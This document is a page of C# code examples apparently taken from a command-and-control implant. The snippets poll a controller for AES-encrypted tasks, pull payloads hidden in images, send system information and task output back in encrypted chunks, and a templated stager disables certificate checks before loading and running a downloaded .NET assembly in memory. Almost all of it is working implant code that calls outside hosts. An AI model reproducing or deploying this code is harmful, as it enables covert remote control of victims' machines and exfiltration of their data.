示例#1
0
        public static TaskMsg GetTaskHttp(CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string targetclass, bool isCovered)
        {
            wc.UseDefaultCredentials = true;
            wc.Proxy             = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
            string resp = wc.DownloadString(rpaddress);

            if (!string.IsNullOrEmpty(resp))
            {
                if (isCovered)
                {
                    string baseurl = rpaddress.Substring(0, rpaddress.LastIndexOf('/'));
                    resp = Encoding.Default.GetString(ImageLoader.ImageLoader.Load(baseurl, rpaddress, resp, wc, targetclass));
                }
                var line = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv);

                TaskMsg task = null;
                try
                {
                    task = new JavaScriptSerializer().Deserialize <TaskMsg>(line);
                    //task = JsonConvert.DeserializeObject<TaskMsg>(line);
                }
                catch (Exception)
                {
                }

                return(task);
            }
            else
            {
                return(null);
            }
        }
示例#2
0
        //AES
        public static void SendOutputHttp(string taskinstance, string output, CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string param, string agentid, string agentpivot = null)
        {
            ResponseMsg respmsg = new ResponseMsg
            {
                TaskInstanceid = taskinstance,
                SystemInfo     = GetSystemInfo(),
                Chunked        = false,
                Agentid        = agentid,
                Number         = 1,
                Data           = output
            };

            if (agentpivot != null)
            {
                respmsg.AgentPivot = agentpivot;
            }


            string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
            //string respmsgjson = JsonConvert.SerializeObject(respmsg, Formatting.Indented);
            var response = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);

            string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));

            wc.UseDefaultCredentials = true;
            wc.Proxy             = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

            string resp = wc.UploadString(rpaddress, post);
        }
示例#3
0
        public static byte[] Load(string baseurl, string rpaddress, string page, CookiedWebClient wc, string targetclass)
        {
            List <string> imagetags = GetImagesInHTMLString(page, targetclass);
            string        s         = imagetags.First();

            wc.Headers.Add(HttpRequestHeader.Referer, rpaddress);
            Stream imgstream = wc.OpenRead(baseurl + GetIdValue(s, "src"));

            return(GetPayloadFromImage(imgstream, Int32.Parse(GetIdValue(s, "id"))));
        }
示例#4
0
    public static void Execute()
    {
        string[] pageget =
        {
            #PAGEGET #
        };

        string[] pagepost =
        {
            #PAGEPOST #
        };

        string param     = "#PARAM#";
        string serverkey = "#SERVERKEY#";
        string host      = "#HOST#";

        string namedpipe = "#PIPENAME#";

        int port            = 0;
        int targetframework = 40;

        Int32.TryParse("#PORT#", out port);
        Int32.TryParse("#FRAMEWORK#", out targetframework);

        Thread.Sleep(10000);
        AgentIdReqMsg agentIdReqMsg = new AgentIdReqMsg();

        agentIdReqMsg.address   = host;
        agentIdReqMsg.port      = port;
        agentIdReqMsg.request   = "agentid";
        agentIdReqMsg.framework = targetframework;


        string agentidrequesttemplate = new JavaScriptSerializer().Serialize(agentIdReqMsg);
        bool   agentexit = false;

        while (true && !agentexit)
        {
            try
            {
                string resp                = "";
                string cookievalue         = "";
                NamedPipeClientStream pipe = null;
                if (string.IsNullOrEmpty(namedpipe))
                {
                    CookiedWebClient wc = new CookiedWebClient();
                    wc.UseDefaultCredentials = true;
                    wc.Proxy             = WebRequest.DefaultWebProxy;
                    wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

                    WebHeaderCollection webHeaderCollection = new WebHeaderCollection();

                    webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#");

                    #HEADERS #

                    wc.Headers = webHeaderCollection;

                    ServicePointManager.Expect100Continue      = true;
                    ServicePointManager.SecurityProtocol       = (SecurityProtocolType)3072;
                    ServicePointManager.DefaultConnectionLimit = 9999;
                    ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return(true); });

                    string post      = String.Format("{0}={1}", param, EncryptMessage(serverkey, agentidrequesttemplate));
                    string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)], post);

                    resp = wc.UploadString(rpaddress, post);

                    Cookie cookie = wc.ResponseCookies["sessionid"];
                    cookievalue = cookie.Value;
                }
                else
                {
                    try
                    {
                        pipe = new NamedPipeClientStream(host, namedpipe, PipeDirection.InOut, PipeOptions.Asynchronous);
                        pipe.Connect(5000);
                        pipe.ReadMode = PipeTransmissionMode.Message;

                        //Write AgentIdReqMsg
                        var agentIdrequest = EncryptMessage(serverkey, agentidrequesttemplate);
                        pipe.Write(Encoding.Default.GetBytes(agentIdrequest), 0, agentIdrequest.Length);

                        var messageBytes = ReadMessage(pipe);
                        resp = Encoding.UTF8.GetString(messageBytes);
                    }
                    catch (Exception)
                    {
                    }
                }

                var        line       = DecryptMessage(serverkey, resp);
                AgentIdMsg agentIdMsg = new JavaScriptSerializer().Deserialize <AgentIdMsg>(line);

                object[] agrsstage = new object[] {
                    line, cookievalue, pipe
                };

                System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(getPayload(agentIdMsg.stage));
                assembly.GetTypes()[0].GetMethods()[0].Invoke(null, agrsstage);
            }
示例#5
0
        //AES
        public static void SendCheckinHttp(string agentid, byte[] aeskey, byte[] aesiv, string rpaddress, string param, CookiedWebClient wc)
        {
            //Collect system info
            SystemInfo sinfo = GetSystemInfo();
            CheckInMsg msg   = new CheckInMsg();

            msg.agentid    = agentid;
            msg.systeminfo = sinfo;

            string checkinmsg = new JavaScriptSerializer().Serialize(msg);
            //string checkinmsg = JsonConvert.SerializeObject(msg, Formatting.Indented);
            var checkinmsgenc = Crypto.Aes.EncryptAesMessage(checkinmsg, aeskey, aesiv);

            string post = String.Format("{0}={1}", param, Convert.ToBase64String(checkinmsgenc));

            wc.UseDefaultCredentials = true;
            wc.Proxy             = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

            string resp     = wc.UploadString(rpaddress, post);
            string respjson = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv);
        }
示例#6
0
        //AES
        public static void SendOutputHttp(string taskinstance, string output, CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string param, string agentid, string agentpivot = null)
        {
            wc.UseDefaultCredentials = true;
            wc.Proxy             = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

            ResponseMsg respmsg = new ResponseMsg
            {
                TaskInstanceid = taskinstance,
                SystemInfo     = GetSystemInfo(),
                Chunked        = false,
                Agentid        = agentid,
                Number         = 1
            };

            int chunksize = 1024000;

            //Response need to be splitted
            if (output.Length > chunksize)
            {
                respmsg.Chunked = true;
            }

            //Chunk number
            int chunknum = output.Length / chunksize;

            if (output.Length % chunksize != 0)
            {
                chunknum++;
            }

            respmsg.Number = chunknum;

            int iter = 0;

            do
            {
                int remaining = output.Length - (iter * chunksize);
                if (remaining > chunksize)
                {
                    remaining = chunksize;
                }

                respmsg.Data = output.Substring(iter * chunksize, remaining);

                string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
                //string respmsgjson = JsonConvert.SerializeObject(respmsg, Formatting.Indented);
                var response = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);

                string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));



                string resp = wc.UploadString(rpaddress, post);

                iter++;
            }while (chunknum > iter);

            if (respmsg.Chunked)
            {
                respmsg.Data   = "";
                respmsg.Number = 0;

                string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
                var    response    = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);

                string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));
                string resp = wc.UploadString(rpaddress, post);
            }
        }